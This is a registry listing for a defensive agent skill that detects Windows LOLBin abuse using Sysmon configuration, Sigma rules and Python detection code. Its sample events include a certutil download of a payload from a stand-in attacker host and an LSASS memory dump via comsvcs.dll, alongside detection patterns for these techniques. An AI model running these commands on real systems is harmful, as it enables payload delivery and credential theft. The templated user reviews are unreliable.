detecting-living-off-the-land-attacks▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.
| name | detecting-living-off-the-land-attacks |
| description | 'Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns. ' |
| domain | cybersecurity |
| subdomain | threat-detection |
| tags | - lolbins - lotl - fileless-attacks - process-monitoring |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| d3fend_techniques | - Application Protocol Command Analysis - Network Isolation - Network Traffic Analysis - Client-server Payload Profiling - Network Traffic Community Deviation |
| nist_csf | - DE.CM-01 - DE.AE-02 - DE.AE-06 - ID.RA-05 |
Detecting Living Off the Land Attacks
Monitor for suspicious use of legitimate Windows binaries (LOLBins) including certutil, mshta, rundll32, regsvr32, and others used in fileless and living-off-the-land attack techniques.
When to Use
- Building detection rules for SIEM or EDR platforms to catch LOLBin abuse in real time
- Investigating alerts where legitimate system binaries appear in unexpected execution contexts
- Threat hunting across endpoint telemetry for fileless attack indicators
- Hardening application whitelisting policies (AppLocker, WDAC) to restrict dangerous LOLBin usage
- Creating Sysmon configurations tuned to capture LOLBin-related process creation events
- Responding to incidents where adversaries bypassed AV by using only built-in OS tools
Do not use for blocking all LOLBin execution outright; these are legitimate system tools with valid administrative uses. Detection must focus on anomalous context (parent process, command-line arguments, network activity) rather than binary presence alone.
Prerequisites
- Sysmon v15+ installed on Windows endpoints with a tuned configuration (SwiftOnSecurity or Olaf Hartong baseline)
- SIEM platform ingesting Sysmon Event IDs 1 (Process Create), 3 (Network Connection), 7 (Image Loaded), 11 (File Create)
- Windows Event Log forwarding for Security Event IDs 4688 (Process Creation with command-line logging enabled)
- LOLBAS project reference: https://lolbas-project.github.io/
- Python 3.8+ with
evtx,pandasfor offline log analysis - Sigma rule repository for cross-platform detection rule authoring
Workflow
Step 1: Deploy a LOLBin-Focused Sysmon Configuration
Create a Sysmon config that captures the process creation and network events needed for LOLBin detection:
<!-- File: sysmon-lolbin-detection.xml -->
<Sysmon schemaversion="4.90">
<EventFiltering>
<!-- Process Creation: capture all LOLBin executions with full command lines -->
<RuleGroup name="LOLBin Process Creation" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="end with">certutil.exe</Image>
<Image condition="end with">mshta.exe</Image>
<Image condition="end with">rundll32.exe</Image>
<Image condition="end with">regsvr32.exe</Image>
<Image condition="end with">msbuild.exe</Image>
<Image condition="end with">installutil.exe</Image>
<Image condition="end with">cmstp.exe</Image>
<Image condition="end with">wmic.exe</Image>
<Image condition="end with">bitsadmin.exe</Image>
<Image condition="end with">certreq.exe</Image>
<Image condition="end with">esentutl.exe</Image>
<Image condition="end with">expand.exe</Image>
<Image condition="end with">extrac32.exe</Image>
<Image condition="end with">findstr.exe</Image>
<Image condition="end with">hh.exe</Image>
<Image condition="end with">ie4uinit.exe</Image>
<Image condition="end with">mavinject.exe</Image>
<Image condition="end with">msiexec.exe</Image>
<Image condition="end with">odbcconf.exe</Image>
<Image condition="end with">pcalua.exe</Image>
<Image condition="end with">presentationhost.exe</Image>
<Image condition="end with">replace.exe</Image>
<Image condition="end with">xwizard.exe</Image>
<!-- PowerShell variants -->
<Image condition="end with">powershell.exe</Image>
<Image condition="end with">pwsh.exe</Image>
<!-- Script hosts -->
<Image condition="end with">cscript.exe</Image>
<Image condition="end with">wscript.exe</Image>
</ProcessCreate>
</RuleGroup>
<!-- Network connections from LOLBins (highly suspicious) -->
<RuleGroup name="LOLBin Network" groupRelation="or">
<NetworkConnect onmatch="include">
<Image condition="end with">certutil.exe</Image>
<Image condition="end with">mshta.exe</Image>
<Image condition="end with">rundll32.exe</Image>
<Image condition="end with">regsvr32.exe</Image>
<Image condition="end with">msbuild.exe</Image>
<Image condition="end with">bitsadmin.exe</Image>
<Image condition="end with">expand.exe</Image>
<Image condition="end with">esentutl.exe</Image>
<Image condition="end with">replace.exe</Image>
</NetworkConnect>
</RuleGroup>
</EventFiltering>
</Sysmon>
# Install or update Sysmon with the LOLBin config
sysmon64.exe -accepteula -i sysmon-lolbin-detection.xml
# Update existing Sysmon installation
sysmon64.exe -c sysmon-lolbin-detection.xml
Step 2: Build Sigma Detection Rules for Key LOLBins
Write Sigma rules that detect specific abuse patterns, translatable to any SIEM:
# File: sigma/certutil_download.yml
title: Certutil Used to Download File
id: a1b2c3d4-5678-9abc-def0-123456789abc
status: stable
description: >
Detects certutil.exe being used to download files from remote URLs,
a common LOLBin technique for payload delivery (LOLBAS T1105).
references:
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
- https://attack.mitre.org/techniques/T1105/
author: Threat Detection Team
date: 2026/01/20
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\certutil.exe'
CommandLine|contains|all:
- 'urlcache'
- '-f'
- 'http'
condition: selection
falsepositives:
- Legitimate certificate enrollment using certutil with URL parameters
level: high
tags:
- attack.defense_evasion
- attack.t1218
- attack.command_and_control
- attack.t1105
# File: sigma/mshta_execution.yml
title: MSHTA Executing Remote or Inline Script
id: b2c3d4e5-6789-abcd-ef01-234567890bcd
status: stable
description: >
Detects mshta.exe executing scripts from URLs or inline VBScript/JavaScript,
commonly used for application whitelisting bypass and initial access.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- https://attack.mitre.org/techniques/T1218/005/
logsource:
category: process_creation
product: windows
detection:
selection_remote:
Image|endswith: '\mshta.exe'
CommandLine|contains: 'http'
selection_inline:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'vbscript:'
- 'javascript:'
selection_parent_anomaly:
Image|endswith: '\mshta.exe'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\outlook.exe'
- '\powerpnt.exe'
condition: selection_remote or selection_inline or selection_parent_anomaly
falsepositives:
- Legacy HTA-based internal applications
level: high
# File: sigma/regsvr32_scrobj.yml
title: Regsvr32 Squiblydoo Scriptlet Execution
id: c3d4e5f6-7890-bcde-f012-345678901cde
status: stable
description: >
Detects regsvr32.exe loading scrobj.dll with a remote scriptlet URL,
known as the Squiblydoo technique for AppLocker bypass.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- https://attack.mitre.org/techniques/T1218/010/
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|all:
- 'scrobj.dll'
- '/i:'
condition: selection
falsepositives:
- Legitimate COM scriptlet registration (rare in modern environments)
level: critical
Step 3: Analyze Sysmon Logs for LOLBin Abuse Patterns
Parse and correlate Sysmon events to identify suspicious LOLBin execution:
import json
import re
from datetime import datetime, timedelta
from collections import defaultdict
from pathlib import Path
# Known LOLBins and their suspicious command-line indicators
LOLBIN_SIGNATURES = {
"certutil.exe": {
"suspicious_args": [
r"-urlcache\s+-f\s+http",
r"-decode\s+",
r"-encode\s+",
r"-verifyctl\s+.*http",
],
"mitre": "T1218, T1105",
"severity": "high"
},
"mshta.exe": {
"suspicious_args": [
r"https?://",
r"vbscript:",
r"javascript:",
r"about:",
],
"mitre": "T1218.005",
"severity": "high"
},
"rundll32.exe": {
"suspicious_args": [
r"javascript:",
r"shell32\.dll.*ShellExec_RunDLL",
r"\\\\.*\\.*\.dll", # UNC path DLL loading
r"comsvcs\.dll.*MiniDump", # LSASS dump via comsvcs
],
"mitre": "T1218.011",
"severity": "critical"
},
"regsvr32.exe": {
"suspicious_args": [
r"/s\s+/n\s+/u\s+/i:",
r"scrobj\.dll",
r"https?://",
],
"mitre": "T1218.010",
"severity": "critical"
},
"bitsadmin.exe": {
"suspicious_args": [
r"/transfer\s+.*https?://",
r"/create\s+.*\/addfile\s+.*https?://",
r"/SetNotifyCmdLine",
],
"mitre": "T1197",
"severity": "high"
},
"wmic.exe": {
"suspicious_args": [
r"process\s+call\s+create",
r"/node:",
r"os\s+get\s+/format:.*https?://",
r"xsl.*https?://",
],
"mitre": "T1047",
"severity": "high"
},
"msbuild.exe": {
"suspicious_args": [
r"\.xml\b",
r"\.csproj\b",
r"\\temp\\",
r"\\appdata\\",
],
"mitre": "T1127.001",
"severity": "high"
},
"mavinject.exe": {
"suspicious_args": [
r"/INJECTRUNNING\s+\d+",
],
"mitre": "T1218.013",
"severity": "critical"
},
}
def analyze_sysmon_events(events):
"""Analyze Sysmon process creation events for LOLBin abuse."""
alerts = []
for event in events:
image = event.get("Image", "").lower()
cmdline = event.get("CommandLine", "")
parent = event.get("ParentImage", "")
# Check if the process is a known LOLBin
for lolbin, config in LOLBIN_SIGNATURES.items():
if image.endswith(lolbin.lower()):
for pattern in config["suspicious_args"]:
if re.search(pattern, cmdline, re.IGNORECASE):
alert = {
"timestamp": event.get("UtcTime", ""),
"hostname": event.get("Computer", ""),
"lolbin": lolbin,
"command_line": cmdline,
"parent_process": parent,
"user": event.get("User", ""),
"process_id": event.get("ProcessId", ""),
"parent_pid": event.get("ParentProcessId", ""),
"mitre_technique": config["mitre"],
"severity": config["severity"],
"matched_pattern": pattern,
}
alerts.append(alert)
break
return alerts
# Example usage with parsed Sysmon events
sample_events = [
{
"UtcTime": "2026-01-20 14:32:15.000",
"Computer": "WORKSTATION-01",
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil.exe -urlcache -f http://evil.example.com/payload.exe C:\\temp\\update.exe",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"ProcessId": "4532",
"ParentProcessId": "2108",
},
{
"UtcTime": "2026-01-20 14:33:01.000",
"Computer": "WORKSTATION-01",
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32.exe comsvcs.dll, MiniDump 624 C:\\temp\\dump.bin full",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"User": "CORP\\jsmith",
"ProcessId": "5128",
"ParentProcessId": "2108",
},
]
alerts = analyze_sysmon_events(sample_events)
for alert in alerts:
print(f"[{alert['severity'].upper()}] {alert['lolbin']} on {alert['hostname']}")
print(f" MITRE: {alert['mitre_technique']}")
print(f" Command: {alert['command_line'][:120]}")
print(f" Parent: {alert['parent_process']}")
print(f" User: {alert['user']}")
print()
Step 4: Detect LOLBin Network Connections
LOLBins making outbound network connections is a strong indicator of malicious use:
def detect_lolbin_network_activity(network_events, process_events):
"""Correlate Sysmon network events (ID 3) with process creation (ID 1)
to find LOLBins making outbound connections."""
# LOLBins that should rarely make outbound connections
NETWORK_SUSPICIOUS = {
"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
"msbuild.exe", "installutil.exe", "bitsadmin.exe", "esentutl.exe",
"expand.exe", "replace.exe", "cmstp.exe", "presentationhost.exe",
}
alerts = []
for event in network_events:
image = event.get("Image", "").lower()
binary_name = image.split("\\")[-1] if "\\" in image else image
if binary_name in NETWORK_SUSPICIOUS:
dest_ip = event.get("DestinationIp", "")
dest_port = event.get("DestinationPort", "")
# Skip localhost and internal DNS
if dest_ip.startswith("127.") or dest_ip == "::1":
continue
alert = {
"type": "lolbin_network_connection",
"binary": binary_name,
"destination_ip": dest_ip,
"destination_port": dest_port,
"destination_hostname": event.get("DestinationHostname", ""),
"source_ip": event.get("SourceIp", ""),
"user": event.get("User", ""),
"timestamp": event.get("UtcTime", ""),
"severity": "critical",
}
alerts.append(alert)
print(f"[CRITICAL] {binary_name} connected to "
f"{dest_ip}:{dest_port} ({event.get('DestinationHostname', 'N/A')})")
return alerts
Step 5: Monitor Anomalous Parent-Child Process Relationships
# Suspicious parent-child relationships indicating LOLBin abuse
SUSPICIOUS_PARENT_CHILD = [
# Office apps spawning LOLBins (macro execution)
{"parent": ["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"],
"child": ["cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
"wscript.exe", "cscript.exe", "certutil.exe"],
"severity": "critical", "mitre": "T1204.002"},
# Explorer spawning script interpreters directly
{"parent": ["explorer.exe"],
"child": ["mshta.exe", "regsvr32.exe", "msbuild.exe"],
"severity": "high", "mitre": "T1218"},
# WMI provider spawning processes (lateral movement)
{"parent": ["wmiprvse.exe"],
"child": ["cmd.exe", "powershell.exe", "mshta.exe"],
"severity": "critical", "mitre": "T1047"},
# Services spawning unusual children
{"parent": ["services.exe"],
"child": ["cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe"],
"severity": "high", "mitre": "T1543.003"},
]
def check_parent_child_anomaly(event):
"""Check if a process creation event has a suspicious parent-child pair."""
parent = event.get("ParentImage", "").split("\\")[-1].lower()
child = event.get("Image", "").split("\\")[-1].lower()
for rule in SUSPICIOUS_PARENT_CHILD:
if parent in rule["parent"] and child in rule["child"]:
return {
"alert_type": "suspicious_parent_child",
"parent": parent,
"child": child,
"command_line": event.get("CommandLine", ""),
"mitre": rule["mitre"],
"severity": rule["severity"],
"hostname": event.get("Computer", ""),
"user": event.get("User", ""),
"timestamp": event.get("UtcTime", ""),
}
return None
Step 6: Implement AppLocker or WDAC Hardening
Restrict unnecessary LOLBin execution with application control policies:
# Query current AppLocker policy
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
# Create AppLocker rules to restrict certutil to admin-only
$rule = New-AppLockerPolicy -RuleType Publisher -RuleNamePrefix "Block" `
-FileInformation "C:\Windows\System32\certutil.exe" `
-User "S-1-1-0" -Deny
# Export current policy for backup before applying changes
Get-AppLockerPolicy -Effective -Xml > AppLocker_Backup.xml
# Block specific LOLBins for standard users via GPO script
$lolbins_to_restrict = @(
"mshta.exe", "cmstp.exe", "msbuild.exe", "installutil.exe",
"regsvr32.exe", "presentationhost.exe", "ie4uinit.exe",
"mavinject.exe", "xwizard.exe"
)
foreach ($binary in $lolbins_to_restrict) {
$path = "C:\Windows\System32\$binary"
if (Test-Path $path) {
Write-Output "Restricting: $path"
# Apply WDAC deny rule via PowerShell
# In production, use Group Policy or Intune WDAC policies
}
}
Verification
- Confirm Sysmon is logging Event ID 1 (Process Creation) with full command-line arguments for all listed LOLBins
- Validate Sigma rules convert correctly to your SIEM query language using
sigmacorsigma-cli - Test detection by executing benign LOLBin commands in a lab environment and confirming alerts fire
- Verify parent-child anomaly detection catches Office-to-LOLBin chains (e.g.,
winword.exespawningcertutil.exe) - Confirm LOLBin network connection detection triggers when
certutil.exeormshta.exereach out to external IPs - Check that AppLocker or WDAC policies do not break legitimate administrative workflows before deploying to production
- Validate false positive rates by running detection rules against 7 days of baseline telemetry from a clean environment
- Cross-reference detections against the LOLBAS project database at https://lolbas-project.github.io/ for completeness
How to use detecting-living-off-the-land-attacks on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add detecting-living-off-the-land-attacks
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches detecting-living-off-the-land-attacks from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate detecting-living-off-the-land-attacks. Access the skill through slash commands (e.g., /detecting-living-off-the-land-attacks) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.6★★★★★75 reviews- ★★★★★Carlos Mensah· Dec 24, 2024
Useful defaults in detecting-living-off-the-land-attacks — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Ganesh Mohane· Dec 16, 2024
detecting-living-off-the-land-attacks reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Evelyn Choi· Dec 12, 2024
I recommend detecting-living-off-the-land-attacks for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Carlos Verma· Nov 15, 2024
Registry listing for detecting-living-off-the-land-attacks matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Daniel Gill· Nov 7, 2024
Solid pick for teams standardizing on skills: detecting-living-off-the-land-attacks is focused, and the summary matches what you get after install.
- ★★★★★Daniel Desai· Nov 3, 2024
detecting-living-off-the-land-attacks reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Arya Kim· Oct 26, 2024
detecting-living-off-the-land-attacks has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Arya Chen· Oct 22, 2024
Registry listing for detecting-living-off-the-land-attacks matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Carlos Gill· Oct 6, 2024
detecting-living-off-the-land-attacks reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Daniel Dixit· Sep 21, 2024
detecting-living-off-the-land-attacks has been reliable in day-to-day use. Documentation quality is above average for community skills.
showing 1-10 of 75